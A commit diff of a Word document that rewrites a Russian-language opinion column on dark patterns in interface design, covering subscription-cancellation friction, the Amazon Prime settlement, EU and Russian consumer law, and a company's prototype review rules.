<commit_message>
Rewrite Sfera column in human expert voice, fix Amazon settlement timing
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
</commit_message>
<xml_diff>
--- a/ответы/2026-07-14_сфера-темные-паттерны-манипулятивный-дизайн.docx
+++ b/ответы/2026-07-14_сфера-темные-паттерны-манипулятивный-дизайн.docx
@@ -16,7 +16,7 @@
           <w:b/>
           <w:sz w:val="32"/>
         </w:rPr>
-        <w:t>Тёмные паттерны: где заканчивается удобный интерфейс и начинается манипуляция</w:t>
+        <w:t>Где заканчивается удобный интерфейс и начинается манипуляция покупателем</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -39,7 +39,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
-        <w:t>Раньше, чтобы обмануть покупателя, нужен был человек: продавец, который отговорит от возврата, или мелкий шрифт в договоре, который никто не читает. Сегодня эту работу выполняет интерфейс. Приложение само решает, какой тариф показать первым, какую галочку поставить за вас и сколько экранов должно быть между «я передумал» и реальной отменой подписки. Разница в масштабе: интерфейс не устаёт и не ошибается, а работает одновременно на миллионах пользователей, поэтому и эффект от манипуляции больше, чем от любого нечестного продавца в отдельно взятом магазине.</w:t>
+        <w:t>Недавно я отменял подписку в одном онлайн-сервисе. Оформлялась она когда-то в один клик, а на отмену ушло минут десять. Кнопка нашлась на третьем экране настроек, дальше сервис дважды переспросил, точно ли я понимаю, чего лишаюсь, предложил скидку, потом паузу вместо отмены и напоследок попросил объяснить причины ухода. Это не плохой дизайн. Это очень хороший, дорогой дизайн, просто работает он против пользователя.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -53,7 +53,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
-        <w:t>Я больше двадцати пяти лет управляю бизнесом и сам делаю цифровые продукты, линейку устройств умного дома с приложением и телемедицинский сервис с личным кабинетом и подписками. Поэтому вопрос, где заканчивается удобство и начинается манипуляция, для меня не теоретический: я задаю его своей команде дизайнеров на этапе прототипа, до того как что-либо уходит в разработку.</w:t>
+        <w:t>Я двадцать пять лет управляю компанией, которая разрабатывает системы умного дома, а ещё телемедицинским сервисом с личными кабинетами и подписками. На эту кухню я смотрю с двух сторон сразу, и как покупатель, и как производитель, у которого есть ровно те же соблазны. О соблазнах и поговорим.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -67,7 +67,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
-        <w:t>Граница на самом деле простая. Удобный интерфейс экономит время пользователя и подводит его к решению, которое он и так хотел принять. Манипулятивный интерфейс, его называют «тёмным паттерном», то есть намеренно запутанным дизайном, экономит время и деньги компании за счёт пользователя и подводит его к решению, которое он не принял бы, если бы разобрался. Проверка простая: уберите с экрана спешку, тревогу и путаницу. Если человек выбирает то же самое, это хороший UX, удобный и понятный интерфейс. Если выбор меняется, это манипуляция, как её ни назови в договоре.</w:t>
+        <w:t>У таких приёмов есть устоявшееся название, тёмные паттерны. Так называют интерфейсные решения, построенные, чтобы человек совершил выгодное компании действие, не заметив его или не разобравшись. Заранее проставленная галочка на страховку в форме заказа. Таймер распродажи, который просто перезапускается каждый вечер. Тариф с пометкой «рекомендуем», нарисованный крупно и ярко, рядом с серой незаметной ссылкой на вариант вдвое дешевле. Подписка, которая включается одним нажатием, а выключается через квест.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -81,7 +81,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
-        <w:t>Регуляторы формулируют это не так лирично, но смысл тот же. В Евросоюзе с февраля 2024 года действует статья 25 закона о цифровых услугах (DSA): она прямо запрещает интерфейсы, которые обманывают пользователя или искажают его свободный выбор, а в пояснениях к статье прямо названы примеры, усложнённая отмена подписки и фальшивые таймеры «осталось 3 минуты». В США в сентябре 2025 года Amazon за три дня до начала суда согласился заплатить 2,5 миллиарда долларов по иску Федеральной торговой комиссии. Претензия касалась подписки Prime: оформить её можно было одним кликом, а чтобы отменить, пользователь проходил четыре экрана, шесть кликов и пятнадцать развилок. Внутри компании этот путь так и назывался, «поток Илиады», по аналогии с бесконечной поэмой Гомера.</w:t>
+        <w:t>Грань между удобством и манипуляцией я для себя определяю просто. Хороший интерфейс помогает человеку быстрее сделать то, что он сам собирался. Манипулятивный подталкивает к тому, чего человек не выбирал. Есть и практичный тест. Уберите с экрана таймеры, предзаполненные галочки и тревожные надписи. Если покупатель выберет то же самое, у вас честный и удобный продукт. Если выбор изменится, вы продаёте не товар, а путаницу.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -95,7 +95,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
-        <w:t>В России похожая история произошла с предустановленными галочками. С 1 сентября 2025 года продавцу прямо запрещено включать в заказ платные товары и услуги по умолчанию: согласие на всё дополнительное должно быть оформлено отдельно и осознанно, а не спрятано в уже отмеченном чекбоксе. С 9 января 2026 года штрафы за нарушение выросли в разы, для компании теперь это до 500 тысяч рублей за каждый эпизод, а не разовая мелочь, которую дешевле заплатить, чем переделывать интерфейс.</w:t>
+        <w:t>Регуляторы взялись за это всерьёз. Самый громкий пример дал Amazon. Федеральная торговая комиссия США несколько лет судилась с компанией из-за подписки Prime, где оформление занимало один клик, а отмена вела через четыре экрана, шесть кликов и пятнадцать вариантов ответа. Внутри компании маршрут отмены называли потоком Илиады, в честь очень длинной поэмы Гомера. Более наглядное доказательство умысла придумать трудно. В сентябре 2025 года, на третий день судебного процесса, Amazon согласился заплатить 2,5 миллиарда долларов, из которых полтора миллиарда пойдут на выплаты подписчикам.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -109,7 +109,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
-        <w:t>Можно ли считать это нарушением закона. Да, но с одной особенностью. Отдельного закона о недобросовестных коммерческих практиках, как в Евросоюзе, в России нет. Вместо одного закона работает связка из нескольких. Закон «О защите прав потребителей» обязывает продавца давать полную и достоверную информацию (статья 10) и позволяет отказаться от навязанной услуги с возвратом денег (обновлённая статья 16). Кодекс об административных правонарушениях штрафует за введение потребителя в заблуждение относительно свойств товара или услуги (статья 14.7) и отдельно за нарушение права на информацию (статья 14.8). А если предустановленная галочка или скрытые условия привели к тому, что человек в принципе не понимал, на что подписывается, саму сделку можно оспорить в суде как заключённую под влиянием заблуждения или обмана, это уже статьи 178 и 179 Гражданского кодекса. Проще говоря, один и тот же тёмный паттерн можно атаковать сразу с трёх сторон: штраф от Роспотребнадзора, административное дело и личный иск покупателя.</w:t>
+        <w:t>В Евросоюзе с 2024 года действует закон о цифровых услугах, DSA. Его 25 статья запрещает строить интерфейс так, чтобы он обманывал пользователя или мешал ему принять свободное решение. В пояснениях к закону прямо упомянуты и запутанная процедура отмены подписки, и ложная срочность.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -123,7 +123,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
-        <w:t>Отсюда мой практический совет предпринимателям и менеджерам: не ждите, пока юрист увидит готовый продукт в сторе. У нас в компании правило простое: ни один экран с оплатой, подпиской или согласием на обработку данных не уходит в разработку без короткого разбора на этапе прототипа, до того как дизайнер нарисовал финальные кнопки. На этом разборе всего три вопроса. Может ли человек отказаться так же легко, как согласиться, без звонков в поддержку и поиска кнопки на третьем экране настроек. Есть ли на экране хоть одно утверждение про срочность или ограниченное количество, которое можно проверить фактами, а не просто «создаёт настроение». И останется ли выбор пользователя тем же самым, если убрать предзаполненные галочки и таймер обратного отсчёта.</w:t>
+        <w:t>В России отдельного закона о тёмных паттернах нет, но нужные нормы уже собраны по частям. С 1 сентября 2025 года продавцу прямо запрещено продавать что-либо через заранее проставленные галочки. Согласие покупателя на любую платную дополнительную услугу должно быть отдельным осознанным действием, а всё навязанное он вправе не оплачивать или потребовать деньги обратно. С 9 января 2026 года штрафы стали чувствительными, для компании до пятисот тысяч рублей за эпизод.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -137,7 +137,49 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
-        <w:t>Если на все три вопроса можно честно ответить «да», претензий потом не будет, потому что придираться будет не к чему. Юрист, подключённый на этапе идеи, обходится бизнесу в разы дешевле юриста, который тушит пожар после жалобы в Роспотребнадзор или иска в суде. А доверие покупателя, который один раз почувствовал себя обманутым интерфейсом, потом не покупается ни за какие деньги.</w:t>
+        <w:t>Юристы, с которыми я это обсуждал, раскладывают риски так. Обман и введение потребителя в заблуждение подпадают под статью 14.7 КоАП, неполная или недостоверная информация под статью 14.8. Право покупателя на полную информацию и запрет навязывания закреплены в статьях 10 и 16 закона о защите прав потребителей. А если человек в принципе не понимал, на что подписывается, сделку можно оспорить по статьям 178 и 179 Гражданского кодекса как заключённую под влиянием заблуждения или обмана. За один и тот же хитрый экран компания может одновременно получить штраф, предписание Роспотребнадзора и иски покупателей.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="200"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>Теперь о том, что делать бизнесу, чтобы не проверять всё это на себе. У нас в компании порядок появился не из благородства, а после пары неприятных разговоров с клиентами. Ни один экран, где есть деньги, подписка или согласие на обработку данных, не уходит в разработку, пока мы не разобрали его на прототипе вместе с юристом. Проверяем три вещи. Отказаться должно быть не сложнее, чем согласиться, тем же числом нажатий. Любое обещание срочности или ограниченного количества должно быть правдой, которую мы готовы подтвердить. И никаких предзаполненных галочек, вообще ни одной.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="200"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>Такой разбор занимает полчаса, дизайнеры к нему быстро привыкают. Юрист на этом этапе стоит несколько часов его времени. Тот же юрист после жалобы в Роспотребнадзор обходится уже совсем в другие деньги, и главное, он уже ничего не может исправить в продукте, который скачали сто тысяч человек.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="200"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>Манипулятивный дизайн действительно работает, в этом его главная ловушка. Конверсия в моменте растёт, отчёты выглядят красиво. Расплата приходит позже, возвратами, жалобами, штрафами и отзывами в магазинах приложений. Поэтому у нас есть ещё одно правило, последнее. Если экран нельзя спокойно показать клиенту в глаза и объяснить, почему он устроен именно так, этот экран мы переделываем.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -566,7 +608,7 @@
     <w:link w:val="10"/>
     <w:uiPriority w:val="9"/>
     <w:qFormat/>
-    <w:rsid w:val="009663FF"/>
+    <w:rsid w:val="00600883"/>
     <w:pPr>
       <w:keepNext/>
       <w:keepLines/>
@@ -589,7 +631,7 @@
     <w:semiHidden/>
     <w:unhideWhenUsed/>
     <w:qFormat/>
-    <w:rsid w:val="009663FF"/>
+    <w:rsid w:val="00600883"/>
     <w:pPr>
       <w:keepNext/>
       <w:keepLines/>
@@ -612,7 +654,7 @@
     <w:semiHidden/>
     <w:unhideWhenUsed/>
     <w:qFormat/>
-    <w:rsid w:val="009663FF"/>
+    <w:rsid w:val="00600883"/>
     <w:pPr>
       <w:keepNext/>
       <w:keepLines/>
@@ -635,7 +677,7 @@
     <w:semiHidden/>
     <w:unhideWhenUsed/>
     <w:qFormat/>
-    <w:rsid w:val="009663FF"/>
+    <w:rsid w:val="00600883"/>
     <w:pPr>
       <w:keepNext/>
       <w:keepLines/>
@@ -658,7 +700,7 @@
     <w:semiHidden/>
     <w:unhideWhenUsed/>
     <w:qFormat/>
-    <w:rsid w:val="009663FF"/>
+    <w:rsid w:val="00600883"/>
     <w:pPr>
       <w:keepNext/>
       <w:keepLines/>
@@ -679,7 +721,7 @@
     <w:semiHidden/>
     <w:unhideWhenUsed/>
     <w:qFormat/>
-    <w:rsid w:val="009663FF"/>
+    <w:rsid w:val="00600883"/>
     <w:pPr>
       <w:keepNext/>
       <w:keepLines/>
@@ -702,7 +744,7 @@
     <w:semiHidden/>
     <w:unhideWhenUsed/>
     <w:qFormat/>
-    <w:rsid w:val="009663FF"/>
+    <w:rsid w:val="00600883"/>
     <w:pPr>
       <w:keepNext/>
       <w:keepLines/>
@@ -723,7 +765,7 @@
     <w:semiHidden/>
     <w:unhideWhenUsed/>
     <w:qFormat/>
-    <w:rsid w:val="009663FF"/>
+    <w:rsid w:val="00600883"/>
     <w:pPr>
       <w:keepNext/>
       <w:keepLines/>
@@ -746,7 +788,7 @@
     <w:semiHidden/>
     <w:unhideWhenUsed/>
     <w:qFormat/>
-    <w:rsid w:val="009663FF"/>
+    <w:rsid w:val="00600883"/>
     <w:pPr>
       <w:keepNext/>
       <w:keepLines/>
@@ -790,7 +832,7 @@
     <w:basedOn w:val="a0"/>
     <w:link w:val="1"/>
     <w:uiPriority w:val="9"/>
-    <w:rsid w:val="009663FF"/>
+    <w:rsid w:val="00600883"/>
     <w:rPr>
       <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
       <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
@@ -804,7 +846,7 @@
     <w:link w:val="2"/>
     <w:uiPriority w:val="9"/>
     <w:semiHidden/>
-    <w:rsid w:val="009663FF"/>
+    <w:rsid w:val="00600883"/>
     <w:rPr>
       <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
       <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
@@ -818,7 +860,7 @@
     <w:link w:val="3"/>
     <w:uiPriority w:val="9"/>
     <w:semiHidden/>
-    <w:rsid w:val="009663FF"/>
+    <w:rsid w:val="00600883"/>
     <w:rPr>
       <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
       <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
@@ -832,7 +874,7 @@
     <w:link w:val="4"/>
     <w:uiPriority w:val="9"/>
     <w:semiHidden/>
-    <w:rsid w:val="009663FF"/>
+    <w:rsid w:val="00600883"/>
     <w:rPr>
       <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
       <w:i/>
@@ -846,7 +888,7 @@
     <w:link w:val="5"/>
     <w:uiPriority w:val="9"/>
     <w:semiHidden/>
-    <w:rsid w:val="009663FF"/>
+    <w:rsid w:val="00600883"/>
     <w:rPr>
       <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
       <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
@@ -858,7 +900,7 @@
     <w:link w:val="6"/>
     <w:uiPriority w:val="9"/>
     <w:semiHidden/>
-    <w:rsid w:val="009663FF"/>
+    <w:rsid w:val="00600883"/>
     <w:rPr>
       <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
       <w:i/>
@@ -872,7 +914,7 @@
     <w:link w:val="7"/>
     <w:uiPriority w:val="9"/>
     <w:semiHidden/>
-    <w:rsid w:val="009663FF"/>
+    <w:rsid w:val="00600883"/>
     <w:rPr>
       <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
       <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
@@ -884,7 +926,7 @@
     <w:link w:val="8"/>
     <w:uiPriority w:val="9"/>
     <w:semiHidden/>
-    <w:rsid w:val="009663FF"/>
+    <w:rsid w:val="00600883"/>
     <w:rPr>
       <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
       <w:i/>
@@ -898,7 +940,7 @@
     <w:link w:val="9"/>
     <w:uiPriority w:val="9"/>
     <w:semiHidden/>
-    <w:rsid w:val="009663FF"/>
+    <w:rsid w:val="00600883"/>
     <w:rPr>
       <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
       <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
@@ -911,7 +953,7 @@
     <w:link w:val="a4"/>
     <w:uiPriority w:val="10"/>
     <w:qFormat/>
-    <w:rsid w:val="009663FF"/>
+    <w:rsid w:val="00600883"/>
     <w:pPr>
       <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
       <w:contextualSpacing/>
@@ -929,7 +971,7 @@
     <w:basedOn w:val="a0"/>
     <w:link w:val="a3"/>
     <w:uiPriority w:val="10"/>
-    <w:rsid w:val="009663FF"/>
+    <w:rsid w:val="00600883"/>
     <w:rPr>
       <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
       <w:spacing w:val="-10"/>
@@ -945,7 +987,7 @@
     <w:link w:val="a6"/>
     <w:uiPriority w:val="11"/>
     <w:qFormat/>
-    <w:rsid w:val="009663FF"/>
+    <w:rsid w:val="00600883"/>
     <w:pPr>
       <w:numPr>
         <w:ilvl w:val="1"/>
@@ -964,7 +1006,7 @@
     <w:basedOn w:val="a0"/>
     <w:link w:val="a5"/>
     <w:uiPriority w:val="11"/>
-    <w:rsid w:val="009663FF"/>
+    <w:rsid w:val="00600883"/>
     <w:rPr>
       <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
       <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
@@ -980,7 +1022,7 @@
     <w:link w:val="22"/>
     <w:uiPriority w:val="29"/>
     <w:qFormat/>
-    <w:rsid w:val="009663FF"/>
+    <w:rsid w:val="00600883"/>
     <w:pPr>
       <w:spacing w:before="160"/>
       <w:jc w:val="center"/>
@@ -996,7 +1038,7 @@
     <w:basedOn w:val="a0"/>
     <w:link w:val="21"/>
     <w:uiPriority w:val="29"/>
-    <w:rsid w:val="009663FF"/>
+    <w:rsid w:val="00600883"/>
     <w:rPr>
       <w:i/>
       <w:iCs/>
@@ -1008,7 +1050,7 @@
     <w:basedOn w:val="a"/>
     <w:uiPriority w:val="34"/>
     <w:qFormat/>
-    <w:rsid w:val="009663FF"/>
+    <w:rsid w:val="00600883"/>
     <w:pPr>
       <w:ind w:left="720"/>
       <w:contextualSpacing/>
@@ -1019,7 +1061,7 @@
     <w:basedOn w:val="a0"/>
     <w:uiPriority w:val="21"/>
     <w:qFormat/>
-    <w:rsid w:val="009663FF"/>
+    <w:rsid w:val="00600883"/>
     <w:rPr>
       <w:i/>
       <w:iCs/>
@@ -1033,7 +1075,7 @@
     <w:link w:val="aa"/>
     <w:uiPriority w:val="30"/>
     <w:qFormat/>
-    <w:rsid w:val="009663FF"/>
+    <w:rsid w:val="00600883"/>
     <w:pPr>
       <w:pBdr>
         <w:top w:val="single" w:sz="4" w:space="10" w:color="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
@@ -1054,7 +1096,7 @@
     <w:basedOn w:val="a0"/>
     <w:link w:val="a9"/>
     <w:uiPriority w:val="30"/>
-    <w:rsid w:val="009663FF"/>
+    <w:rsid w:val="00600883"/>
     <w:rPr>
       <w:i/>
       <w:iCs/>
@@ -1066,7 +1108,7 @@
     <w:basedOn w:val="a0"/>
     <w:uiPriority w:val="32"/>
     <w:qFormat/>
-    <w:rsid w:val="009663FF"/>
+    <w:rsid w:val="00600883"/>
     <w:rPr>
       <w:b/>
       <w:bCs/>

</xml_diff>